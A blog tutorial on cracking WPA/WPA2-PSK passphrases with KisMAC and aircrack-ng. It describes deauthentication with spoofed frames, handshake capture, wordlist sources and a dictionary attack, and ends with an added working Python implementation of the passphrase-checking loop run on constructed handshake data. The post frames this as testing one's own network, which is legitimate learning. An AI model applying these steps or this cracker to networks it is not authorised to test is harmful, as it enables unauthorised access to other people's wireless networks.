Cracking WPA Networks with KisMAC+aircrack-ng on Mac OS X Lion

UPDATE 12-5-12: Thanks to a reader (see comments below), I've gotten my hands on a version of KisMAC that works on Mac OS X Mountain Lion! While it may be a beta version, it does at least run and collect unique IVs from my Airport Extreme card, and I'm able to use the data in aircrack-ng.
Download it here: https://s3.amazonaws.com/kismac2/KisMac2.zip

If you read my last post about cracking WEP networks, you're probably ready to take it to the next step: WPA. Cracking WEP is deterministic (capture enough traffic and the key falls out every time); cracking WPA is much more difficult. I've read somewhere that about 25% of WPA networks are cracked. Cracking WEP works by capturing enough encrypted frames (their IVs leak information about the key) and then reconstructing the key from them.
With WPA-PSK (and WPA2-PSK, which works the same way) there is nothing to reconstruct: you must start with a candidate passphrase and see if it fits the "handshake". The passphrase and the SSID are stretched into the PMK with PBKDF2, the PMK is combined with the two MAC addresses and the two nonces from the four-way handshake to give the PTK, and the first 16 bytes of the PTK (the KCK) are used to check the MIC on a captured EAPOL frame. A wrong guess fails the MIC check; the right one passes. Therefore, you need an entire dictionary of pass phrases to test against. The secret to cracking WPA is having a good dictionary, and the pass phrase you're trying to crack MUST be in the dictionary you're using; aircrack-ng cannot recover a passphrase that is not in the list. Luckily, you're only interested in cracking your own WPA network, so you already know the key. The same tools are used to crack WPA, so follow my previous post to get set up. Essentially, you need KisMAC and aircrack-ng.
Here's how we'll crack WPA:

1. Deauthenticate the network.
2. Capture a handshake.
3. Get a dictionary.
4. Run a dictionary attack using the captured handshake.
Deauthenticating the network

Deauthenticating a network requires a card that supports packet injection (the Airport Extreme card does not). If you don't have such a card, you can skip this step, but you might have to wait a long time to capture a handshake. Let's get started. Fire up KisMAC and set up your preferences for your card(s) and dumps (see previous post). Start scanning and select the network you want to crack. Click Network->Deauthenticate. Deauthenticating sends spoofed 802.11 deauthentication frames in the access point's name; management frames carry no authentication in WPA/WPA2 (unless 802.11w is in use), so clients obey them, drop off the network, reconnect, and perform a fresh four-way handshake that you can capture.

Capture a handshake

If you're able to deauthenticate, in the next few moments (less than a minute), you should see the little light go from red to green, which means you've captured a handshake. If you can't deauthenticate, you'll just have to wait for a device on the network to connect. A handshake only happens when a client associates, so an idle network with no new clients yields nothing, however long you capture.

Get a dictionary

There are tons of dictionaries out there.
I haven't done a lot of experimentation, but I've found moderate success with ftp://ftp.openwall.com/pub/wordlists/ and using the "all.gz" file. Aircrack-ng has a good wiki page here.
Run a dictionary attack

Now it's time to use our dictionary and crack the network. Open up Terminal and run aircrack-ng, giving it the dictionary and the KisMAC dump file. Aircrack-ng should detect the handshake in the dumps and start testing pass phrases. Once aircrack-ng is running, all you can do is wait. You might wait 5 minutes, or 5 years! Each candidate costs 4096 rounds of PBKDF2-HMAC-SHA1 before the cheap MIC comparison, so a CPU core tests on the order of a few thousand pass phrases per second, and the run time is set by how deep in the dictionary the passphrase sits. The network I tested on took about 2.5 hours and 9 million attempts before finding the right key.
If you know the key, make sure to put it in the dictionary for testing purposes.
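To make the "start with a key and see if it fits the handshake" step concrete, here is the check aircrack-ng performs on every dictionary entry, written out in Python. This is an added example, not code from the original post, from KisMAC or from aircrack-ng: PBKDF2 stretches passphrase and SSID into the PMK, PRF-512 derives the PTK (and hence the KCK) from the PMK, MAC addresses and nonces, and an HMAC over the EAPOL-Key frame is compared with the captured MIC. The SSID, MAC addresses, nonces, EAPOL message 2 and wordlist are all constructed here rather than captured, and the "captured" MIC is computed from a passphrase we know, which is exactly the self-test the post recommends: put your own key in the dictionary and confirm the attack finds it. Passphrases are assumed to be ASCII/UTF-8.

```python
import hashlib
import hmac
import struct
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass(frozen=True)
class Handshake:
    """The parts of a four-way handshake that a PSK check needs."""
    ssid: str
    ap_mac: bytes        # authenticator address (AA)
    sta_mac: bytes       # supplicant address (SPA)
    anonce: bytes        # 32-byte nonce from message 1
    snonce: bytes        # 32-byte nonce from message 2
    eapol: bytes         # an EAPOL-Key frame with its MIC field zeroed
    mic: bytes           # the 16-byte MIC that frame actually carried
    key_version: int     # key descriptor version: 1 = TKIP (HMAC-MD5), 2 = CCMP (HMAC-SHA1)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes). This is the slow part."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def kck_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs || min/max of nonces); KCK = PTK[0:16]."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes, key_version: int) -> bytes:
    """MIC over the EAPOL-Key frame (MIC field zeroed), truncated to 16 bytes."""
    if key_version == 1:
        return hmac.new(kck, eapol_mic_zeroed, hashlib.md5).digest()[:16]
    if key_version == 2:
        return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]
    raise ValueError("key descriptor version 3 (AES-CMAC) is not handled here")


def crack_psk(wordlist: Iterable[str], hs: Handshake) -> Optional[str]:
    """Dictionary attack: the candidate whose derived KCK reproduces the captured MIC is the passphrase."""
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if not 8 <= len(candidate) <= 63:        # WPA-PSK passphrases are 8..63 characters; skip the rest
            continue
        kck = kck_from_pmk(pmk_from_passphrase(candidate, hs.ssid),
                           hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)
        if hmac.compare_digest(eapol_mic(kck, hs.eapol, hs.key_version), hs.mic):
            return candidate
    return None


def build_msg2(snonce: bytes, key_version: int) -> bytes:
    """Constructed minimal EAPOL-Key message 2 (RSN descriptor) with the MIC field zeroed."""
    key_info = 0x0100 | 0x0008 | key_version     # MIC set | Pairwise | descriptor version
    body = (b"\x02"                              # descriptor type 2 = RSN
            + struct.pack(">H", key_info)
            + struct.pack(">H", 16)              # key length
            + struct.pack(">Q", 1)               # replay counter
            + snonce
            + bytes(16) + bytes(8) + bytes(8)    # key IV, key RSC, key ID
            + bytes(16)                          # MIC, zeroed for the computation
            + struct.pack(">H", 0))              # key data length
    return b"\x01\x03" + struct.pack(">H", len(body)) + body   # EAPOL version 1, type 3 (Key)


# Constructed sample, not a real capture: our own test network whose passphrase we know.
SSID = "HomeNet"
TRUE_PASSPHRASE = "correct horse"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_MSG2 = build_msg2(SNONCE, key_version=2)
_kck = kck_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
SAMPLE = Handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2,
                   mic=eapol_mic(_kck, EAPOL_MSG2, 2), key_version=2)
WORDLIST = ["password", "12345678", "qwertyuiop", "correct horse", "letmein1"]

if __name__ == "__main__":
    print("recovered passphrase:", crack_psk(WORDLIST, SAMPLE))
```

Two things worth noticing in the loop: everything but pmk_from_passphrase is a handful of HMACs, so the 4096-round PBKDF2 is where all the time goes, and the PMK depends only on passphrase and SSID, which is why tools such as cowpatty/genpmk precompute PMK tables per common SSID. pmk_from_passphrase can be checked against the IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE"), and the MIC variant must match the key descriptor version in the captured frame: a CCMP handshake checked with HMAC-MD5 will never match, however good the dictionary.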